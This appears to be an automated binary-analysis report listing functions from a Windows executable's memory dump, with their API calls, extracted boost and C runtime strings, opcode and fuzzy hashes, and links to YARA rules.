String ID: \A$boost::thread_resource_error
API String ID: 198059956-2274436434
Opcode ID: 75ba037e1a2fee592f0ffb212b10fbf52aff3762c5be22bcafcb1f5eab1aff46
Instruction ID: 3a6d61d6cbfb7a1cd7bdc6004fbd6872e71c65389f45b73d5c14f5fc945e441d
Opcode Fuzzy Hash: 75ba037e1a2fee592f0ffb212b10fbf52aff3762c5be22bcafcb1f5eab1aff46
Instruction Fuzzy Hash: 7CF0A071940208EBDF10EF94DD15BDD7B31EB00704F004159F905AA680D7B54A848B85

Uniqueness

Uniqueness Score: -1.00%

Function 00412535, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041253A

Part of subcall function 00412730: __EH_prolog.LIBCMT ref: 00412735

Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8

__CxxThrowException@8.LIBVCRUNTIME ref: 00412588

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Strings

u*A, xrefs: 00412566
h9A, xrefs: 0041256D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: h9A$u*A
API String ID: 1193697898-1879692700
Opcode ID: ec4cfd4c4d17e826686f21b6679fe394d0da0802c20cbf9dfbf5b4353eb7ec35
Instruction ID: 5aef6b70cab11d1d3b7f651b313a36864c524077e779482f411509be261b37f1
Opcode Fuzzy Hash: ec4cfd4c4d17e826686f21b6679fe394d0da0802c20cbf9dfbf5b4353eb7ec35
Instruction Fuzzy Hash: 20F01CB08012C8AACB04EBE1C65A6CDBFB1AF14345F60416CD0117A195C7F90B4DCB59

Uniqueness

Uniqueness Score: -1.00%

Function 004167E3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004167E8
std::exception::exception.LIBCONCRT ref: 00416805

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

Part of subcall function 0041CEE0: __EH_prolog.LIBCMT ref: 0041CEE5
Part of subcall function 0041CEE0: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CF33

Strings

could not convert calendar time to UTC time, xrefs: 004167FD
Ltm, xrefs: 0041681C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw___std_exception_copystd::exception::exception
String ID: Ltm$could not convert calendar time to UTC time
API String ID: 4220666059-658327178
Opcode ID: 605d8d01fec743700305596844c76c722fdf7dc2fa8a7c5cfdb5b2147f57597f
Instruction ID: dcf43351c399c8163aa825fff023e3ee703282c807e2fbf5db019ee19938c0da
Opcode Fuzzy Hash: 605d8d01fec743700305596844c76c722fdf7dc2fa8a7c5cfdb5b2147f57597f
Instruction Fuzzy Hash: AEE09A70D00249AACB04FFA0D9227EEBF71EB00318F00017EE800A6681EB795A88DBC5

Uniqueness

Uniqueness Score: -1.00%

Function 004265B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004265BD
std::exception::exception.LIBCONCRT ref: 004265CE

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

Strings

call to empty boost::function, xrefs: 004265C6
>A, xrefs: 004265E4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog___std_exception_copystd::exception::exception
String ID: call to empty boost::function$>A
API String ID: 238416039-2994083794
Opcode ID: 492e1df3a0f4214d0b2323c24fd4c8d8686f51a7345613202c2030e716205531
Instruction ID: 1c48ea23e6bb69889d1b3afc54994ae3e49856f857573f9c22d91e325ea18a39
Opcode Fuzzy Hash: 492e1df3a0f4214d0b2323c24fd4c8d8686f51a7345613202c2030e716205531
Instruction Fuzzy Hash: 26E09AB1D00618EBEB20EF48C90639DBFB8EB04324F1002AEE41067782D7F81F408B81

Uniqueness

Uniqueness Score: -1.00%

Function 004A8E29, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 004A8E35
std::locale::_Init.LIBCPMT ref: 004A8E3E

Part of subcall function 0057BBA4: __EH_prolog3.LIBCMT ref: 0057BBAB
Part of subcall function 0057BBA4: std::_Lockit::_Lockit.LIBCPMT ref: 0057BBB6
Part of subcall function 0057BBA4: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0057BBC9
Part of subcall function 0057BBA4: std::locale::_Setgloballocale.LIBCPMT ref: 0057BBD1
Part of subcall function 0057BBA4: _Yarn.LIBCPMT ref: 0057BBE7
Part of subcall function 0057BBA4: std::_Lockit::~_Lockit.LIBCPMT ref: 0057BC25

Strings

|m, xrefs: 004A8E2A
08J, xrefs: 004A8E2F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::locale::_$Lockitstd::_$H_prolog3InitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
String ID: 08J$|m
API String ID: 2548088810-1892464957
Opcode ID: 05ad9c44b4fa1269ab19f17aa78e09bd5db8aa7ce0f661cd5fa0b926787b62a0
Instruction ID: 84d4d794cb36093314a0ecf770378b6f4a9c69e4101786ffe60e292f9d90b6d8
Opcode Fuzzy Hash: 05ad9c44b4fa1269ab19f17aa78e09bd5db8aa7ce0f661cd5fa0b926787b62a0
Instruction Fuzzy Hash: 56D05E72B057115EE3946B2AB906A49AAD6EFD1720F14402FF108DB281EFF158058758

Uniqueness

Uniqueness Score: -1.00%

Function 0057AFEE, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 0057B046
MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000,?,?,00000000), ref: 0057B094
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 0057B106
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 0057B12E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: 78532f4eb4cc30fce3039c6e99c2987ab6b489a4be3efa3f6a7a0536c04f91e9
Instruction ID: 817d2636629a9579f51fe3816d624a65d51a02ddc0dd660ab6097459060bc077
Opcode Fuzzy Hash: 78532f4eb4cc30fce3039c6e99c2987ab6b489a4be3efa3f6a7a0536c04f91e9
Instruction Fuzzy Hash: B4410231A00345EFEB218F64E849BBB7FE9BF41310F14892AE4298B191D771AC44EB40

Uniqueness

Uniqueness Score: -1.00%

Function 0068BD18, Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a15b45b0f763e1c9e0244f52812c25da5cfa2678390685caaefadf5a9c4950b
Instruction ID: 6b2c675e6c4dc60017a3341f5f4b1402dd779f2f9c944f98ce804adc70080440
Opcode Fuzzy Hash: 6a15b45b0f763e1c9e0244f52812c25da5cfa2678390685caaefadf5a9c4950b
Instruction Fuzzy Hash: 7341C472600604BFD724BF78CC41BAABBEAEF85710F10572EF511DB691D771A9428B84

Uniqueness

Uniqueness Score: -1.00%

Function 0042542B, Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425430
EnterCriticalSection.KERNEL32(?), ref: 00425444
LeaveCriticalSection.KERNEL32(?), ref: 00425472
CloseHandle.KERNEL32(00000004), ref: 00425497

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CloseEnterH_prologHandleLeave
String ID:
API String ID: 2171098948-0
Opcode ID: 93d3f9291c0a5d70df9dfd401076807cd14d36c3e60e4cc29ba1194ae8c529f4
Instruction ID: 60bbdf61d8af7353e964979f1b10fe484abc8bd98e495041b2ab3131eb4d8b2a
Opcode Fuzzy Hash: 93d3f9291c0a5d70df9dfd401076807cd14d36c3e60e4cc29ba1194ae8c529f4
Instruction Fuzzy Hash: CC419A71E01A259FCB28EF98D5407AEFBB1BF04311F51415ED509A7341C734AA84CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 006A70EE, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000107,00000000,00000000,?,?,?,?,00000001,00000107,?,00000001,?,00000000), ref: 006A713B
MultiByteToWideChar.KERNEL32(?,00000001,?,00000107,00000000,?,?,?,?,00000001,00000107,?,00000001,?,00000000,?), ref: 006A71C4
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000107,?,00000001,?,00000000,?,00000107,?), ref: 006A71D6
__freea.LIBCMT ref: 006A71DF

Part of subcall function 00697D9E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006A1A7D,00001000,00000000,?,?,?,0069753B,00000000,00000000,00000000,?,?), ref: 00697DD0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 575e2d241a1a66a067c3a048e4d5e0d9a65b57bac82a9e6af8177521bf850164
Instruction ID: 85c4a5839cce0b23b8e37a97d6ee6ddb6bfee712d87854a509c72638a2cf1c43
Opcode Fuzzy Hash: 575e2d241a1a66a067c3a048e4d5e0d9a65b57bac82a9e6af8177521bf850164
Instruction Fuzzy Hash: 3431BE72A0020AABDF25AF64DC45DEE7BEAEF41310F180269FC09DA250EB35CD55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00415176, Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041517B
TlsGetValue.KERNEL32 ref: 004151F5
TlsSetValue.KERNEL32(?), ref: 00415208
TlsSetValue.KERNEL32(?,?,?,?,?,?,?), ref: 00415241

Part of subcall function 004152B4: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
Part of subcall function 004152B4: GetLastError.KERNEL32 ref: 004152E5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Value$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 158160221-0
Opcode ID: bd4b4b26a3524fd9cec7b945f2c3bcce7ac64fd8819b3e1191436a365f1de495
Instruction ID: 5f37e0bc0e33191736bb1eab4e31203571527952cf3c2a054520dd8448af09a0
Opcode Fuzzy Hash: bd4b4b26a3524fd9cec7b945f2c3bcce7ac64fd8819b3e1191436a365f1de495
Instruction Fuzzy Hash: 4731B272D01609EFDF05DFA8E8455DEBBB6FF88310F14822BE811E3260EB755A058B95

Uniqueness

Uniqueness Score: -1.00%

Function 00415318, Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0041532A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d60be5514f9b2104be0c091bd552e6071e00c1dcb3ceb957f20bc60efcd10522
Instruction ID: 9bc5851d8e52caf50e524652429ca76b801a20431ce103fae1462ab359919e6c
Opcode Fuzzy Hash: d60be5514f9b2104be0c091bd552e6071e00c1dcb3ceb957f20bc60efcd10522
Instruction Fuzzy Hash: AA31D4B2C01214DFCB14DFA8D949ADEBBF8EF81350F04826BE41597251E3749E04DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00416FC2, Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 00416FFA

Part of subcall function 00416F1E: __EH_prolog.LIBCMT ref: 00416F23

htonl.WS2_32(00000000), ref: 00417011
htonl.WS2_32(00000000), ref: 00417018
htons.WS2_32(?), ref: 0041702C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: htonlhtons$H_prolog
String ID:
API String ID: 984249084-0
Opcode ID: a6dc7d910d3decb1230d67848ea6694069aa25f631c2d9eba95f8cb4ac58f8a7
Instruction ID: e9c69d5b7660021c2f1a433658ea72789310fdb760e50641e223755316ec5930
Opcode Fuzzy Hash: a6dc7d910d3decb1230d67848ea6694069aa25f631c2d9eba95f8cb4ac58f8a7
Instruction Fuzzy Hash: 9A219076910208EFCB209FA4E805F9AB7FAFF08710F00852FF916D7650EB38A5458B95

Uniqueness

Uniqueness Score: -1.00%

Function 004108FA, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004108FF
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 00410939
EnterCriticalSection.KERNEL32 ref: 0041094A
LeaveCriticalSection.KERNEL32(?,?), ref: 0041097A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: 5dcc81ec11878ef5ea5423c18a9a6b27dba59cdc914f6761df54571c70423793
Instruction ID: 542d04b902d24d2433fc51186b0d87aa9f2f1f98f500a02bb48181c6d9bfc5da
Opcode Fuzzy Hash: 5dcc81ec11878ef5ea5423c18a9a6b27dba59cdc914f6761df54571c70423793
Instruction Fuzzy Hash: 2911D0B1901215ABEB14DF14C965BEFBBB8EF05315F10406EE402AB351C7B89981CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004141A9, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004141AE
__Cnd_init.LIBCPMT ref: 004141C5
__Mtx_init.LIBCPMT ref: 004141EA
std::_Cnd_initX.LIBCPMT ref: 0041420E

Part of subcall function 0057A79A: std::_Throw_Cpp_error.LIBCPMT ref: 0057A7C1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cnd_initstd::_$Cpp_errorH_prologMtx_initThrow_
String ID:
API String ID: 3198263272-0
Opcode ID: 4dd36e0ce10ecfbc1864b669625fe4ccab23ddd23f16d4b04b4567666153a1a6
Instruction ID: bfa92cbf377f6f33c9cfccefa7432eddd18fb94d2d3d3add7adb4cf2bbdfe368
Opcode Fuzzy Hash: 4dd36e0ce10ecfbc1864b669625fe4ccab23ddd23f16d4b04b4567666153a1a6
Instruction Fuzzy Hash: 151148729013469ACB15EBBCA4456DEBFF4FF85310F20445EF058A3281C7745B84C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00424460, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424465
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00424499
EnterCriticalSection.KERNEL32 ref: 004244AA
LeaveCriticalSection.KERNEL32(?,?), ref: 004244CD

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: d8e5f773b3efdadf516fd74d24b27c6ed00ff560ec8ffea63c344a3effc1bb97
Instruction ID: 258c393ff98f001144a60ec241e762319f9d96fc056c5d9b2cd83db4fdbe96c2
Opcode Fuzzy Hash: d8e5f773b3efdadf516fd74d24b27c6ed00ff560ec8ffea63c344a3effc1bb97
Instruction Fuzzy Hash: 7D11A971A0160AAFC700DF69C840A9AFBB8FF15321F00412AE505E3650C3709A14CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 004244E6, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004244EB
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 0042451D
EnterCriticalSection.KERNEL32 ref: 0042452E
LeaveCriticalSection.KERNEL32(?,?), ref: 00424551

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: 168b0baaeab592286370e505fd6ff00d40b2bb081cb263b65188e4bf7c72351e
Instruction ID: 014d8d6f37be94fd5c1720e5a6a693d4c815af0b196922f00c1805542592c294
Opcode Fuzzy Hash: 168b0baaeab592286370e505fd6ff00d40b2bb081cb263b65188e4bf7c72351e
Instruction Fuzzy Hash: 6611E17190160AEFC710CF69C840BAEFBB8FF55321F10422AE50497650C330AA14CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 004243E6, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004243EB
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00424414
EnterCriticalSection.KERNEL32(?), ref: 00424425
LeaveCriticalSection.KERNEL32(?,?), ref: 00424447

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: fe73be1346f93151a78e6b96b23f3434234ea2ae8ccebfff9a3a04253d8f79af
Instruction ID: 6cfde56f82e4d9355079032deae8de66d10285b3677ee61e91db1c4128d960b6
Opcode Fuzzy Hash: fe73be1346f93151a78e6b96b23f3434234ea2ae8ccebfff9a3a04253d8f79af
Instruction Fuzzy Hash: BB010C72601A11AFCB05DF64ED84BDABBB9FF04315F40422EE10197550DB306A01CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041534E, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00415353
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?), ref: 0041536F
EnterCriticalSection.KERNEL32(?), ref: 00415381
LeaveCriticalSection.KERNEL32(?,?), ref: 004153A3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: cec609706b0e7a641b05d9bd2dcf178de368b5681dff813f2c4e9ecdaf95a1cb
Instruction ID: 4991fe7f96179a486d843fdadd927c50cb5cd626c9f4cf1cf29df308feaa9662
Opcode Fuzzy Hash: cec609706b0e7a641b05d9bd2dcf178de368b5681dff813f2c4e9ecdaf95a1cb
Instruction Fuzzy Hash: 2B01B872A01A09FFD700DF68DD40BEABBB8FF04355F00012AF10696590CB709A10CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0044BA64, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044BA69

Part of subcall function 004A5476: std::_Deallocate.LIBCONCRT ref: 004A54A6

Strings

d, xrefs: 0044BA93
+, xrefs: 0044BAE0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_
String ID: +$d
API String ID: 3881773970-1886270708
Opcode ID: f26dd83b4e0e415ef4e4dc5bceaed6f621e090c12e37a9c4c4303b9ad8023f4c
Instruction ID: 578d6675532e4f92202541763eb35b178e03138ce80bcea2c8934d082e7561e5
Opcode Fuzzy Hash: f26dd83b4e0e415ef4e4dc5bceaed6f621e090c12e37a9c4c4303b9ad8023f4c
Instruction Fuzzy Hash: C471C471C0528CEAEB10DBA9D9857DDBFB8EF25304F1481AEE041A7281DB745B48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 005C6370, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 005CAFC0: new.LIBCMT ref: 005CB027

__CxxThrowException@8.LIBVCRUNTIME ref: 005C640C

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

Part of subcall function 005C75E0: GetFileAttributesW.KERNEL32(00000000,2ECD3809), ref: 005C761C

__CxxThrowException@8.LIBVCRUNTIME ref: 005C6531

Strings

boost::filesystem::create_directories, xrefs: 005C63C4, 005C64F0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8Throw$AttributesExceptionFileRaise
String ID: boost::filesystem::create_directories
API String ID: 2900745884-2171239142
Opcode ID: ebb181e47100dd9a5278b1de6d7ba718af24ad1d0a806c58871829bcc4a22df8
Instruction ID: 8aeab1c32e58fbefd07005f7cc13f1142bbcd07e60bf1baabd79c10b64c1bdee
Opcode Fuzzy Hash: ebb181e47100dd9a5278b1de6d7ba718af24ad1d0a806c58871829bcc4a22df8
Instruction Fuzzy Hash: 2D5194719002499ECF20EFA0DD46FEE7B78BF55304F50452EE809A7242EB755B49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0042A8F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0042A8F4

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 0042A8FF

Part of subcall function 00472AE5: __EH_prolog.LIBCMT ref: 00472AEA

Part of subcall function 0045D80A: __EH_prolog.LIBCMT ref: 0045D80F

Part of subcall function 0041D068: __EH_prolog.LIBCMT ref: 0041D06D

Part of subcall function 004AAE29: __EH_prolog.LIBCMT ref: 004AAE2E

Part of subcall function 0043F7E2: __EH_prolog.LIBCMT ref: 0043F7E7
Part of subcall function 0043F7E2: new.LIBCMT ref: 0043F80C

Part of subcall function 004A5476: std::_Deallocate.LIBCONCRT ref: 004A54A6

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

:bnotes, xrefs: 0042A94A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_$ExceptionException@8RaiseThrow
String ID: :bnotes
API String ID: 1125004306-326818466
Opcode ID: 0512627774032b42028312398e4df9c80c5ab32c90a91d01ac9ea1f53defc90e
Instruction ID: 029a2b59613941748779a66d82a072b74cfbae75cfcc51ec99fe74e805edec20
Opcode Fuzzy Hash: 0512627774032b42028312398e4df9c80c5ab32c90a91d01ac9ea1f53defc90e
Instruction Fuzzy Hash: 7831A770D04288EADB14EBA5CD55BDEFFB4AF91308F1080AEE045A7292DBB81F49C755

Uniqueness

Uniqueness Score: -1.00%

Function 005C6EA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(2ECD3809,?,?,?), ref: 005C6ED7
__CxxThrowException@8.LIBVCRUNTIME ref: 005C6F62

Strings

boost::filesystem::status, xrefs: 005C6F18

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorException@8LastThrow
String ID: boost::filesystem::status
API String ID: 1006195485-3746320807
Opcode ID: 1df22682422f79bb3bee5f024b7aac41669550d4dfcef8cb59eb874e9f13025b
Instruction ID: 83d76329f1448b2cef73573d61ecc85ea2d3786e9b3cc3cd14bfa4983e5ecf9a
Opcode Fuzzy Hash: 1df22682422f79bb3bee5f024b7aac41669550d4dfcef8cb59eb874e9f13025b
Instruction Fuzzy Hash: 5421B4B1A00309AFDB10AFE4DC45FAEBB79FB45714F00413EF906AB281DB74A9448795

Uniqueness

Uniqueness Score: -1.00%

Function 00424C29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 00424C39
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,?,?), ref: 00424CAB

Strings

M;\, xrefs: 00424C88

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: M;\
API String ID: 203985260-3647747430
Opcode ID: f2b3e7d5c217a3b454de4ff12724f038ad70c9e01be82a67a1ea0a281d17ff98
Instruction ID: bf4bce7ebd16fb88b39a74ada8da4d0a926bf85cbcd1e13be316bb3d280e5189
Opcode Fuzzy Hash: f2b3e7d5c217a3b454de4ff12724f038ad70c9e01be82a67a1ea0a281d17ff98
Instruction Fuzzy Hash: 6421C875A00218BFDB209B699C45BEAB76CEF48320F104666F958E72C1D6745D4487E4

Uniqueness

Uniqueness Score: -1.00%

Function 00412CEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412CF3

Part of subcall function 00412ED6: __EH_prolog.LIBCMT ref: 00412EDB

Part of subcall function 004133D3: __EH_prolog.LIBCMT ref: 004133D8

new.LIBCMT ref: 00412D50

Part of subcall function 00412F31: __EH_prolog.LIBCMT ref: 00412F36

Part of subcall function 00413610: __EH_prolog.LIBCMT ref: 00413615

Strings

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00412D2A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
API String ID: 3519838083-94700417
Opcode ID: daa3e8bc798428724aafbbe3720c33a1cebc288b55502966ad4e34fab00a3195
Instruction ID: f57d167ef99bd1fd727a6f0bad06c7a05e442ee7e3e5ab8d5f477ff4d7a72e8a
Opcode Fuzzy Hash: daa3e8bc798428724aafbbe3720c33a1cebc288b55502966ad4e34fab00a3195
Instruction Fuzzy Hash: 6F318F71D05288EADF04EFE9D5557DEBBB5AF15308F10445DE044AB282CBB80B48C759

Uniqueness

Uniqueness Score: -1.00%

Function 00412DE2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412DE7

Part of subcall function 00412FB1: __EH_prolog.LIBCMT ref: 00412FB6

Part of subcall function 0041326E: __EH_prolog.LIBCMT ref: 00413273

new.LIBCMT ref: 00412E44

Part of subcall function 0041300C: __EH_prolog.LIBCMT ref: 00413011

Part of subcall function 00413665: __EH_prolog.LIBCMT ref: 0041366A

Strings

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00412E1E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 3519838083-2395993697
Opcode ID: a340a7af0eaa5b0310427d3fa4c6608f642522b82531ecfd4ef2c105a4920788
Instruction ID: a0b9ea58d6edb98cd058725c194820e9e6e5e2cc4daacae925e91727ff325561
Opcode Fuzzy Hash: a340a7af0eaa5b0310427d3fa4c6608f642522b82531ecfd4ef2c105a4920788
Instruction Fuzzy Hash: 5D318FB0D05288EADB05EFE9D5557DEBFB5AF15308F10409DE045AB282CBB80B48C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00422932, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422937
std::_Winerror_message.LIBCPMT ref: 0042297F

Part of subcall function 0057BE42: FormatMessageW.KERNEL32(00001200,00000000,00000008,00000000,?,00000000,00000000,00000000,00000000,00000001,00007FFF,00000000,?,00007FFF,00007FFF,00000000), ref: 0057BE90
Part of subcall function 0057BE42: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 0057BEAF

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

unknown error, xrefs: 0042298E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

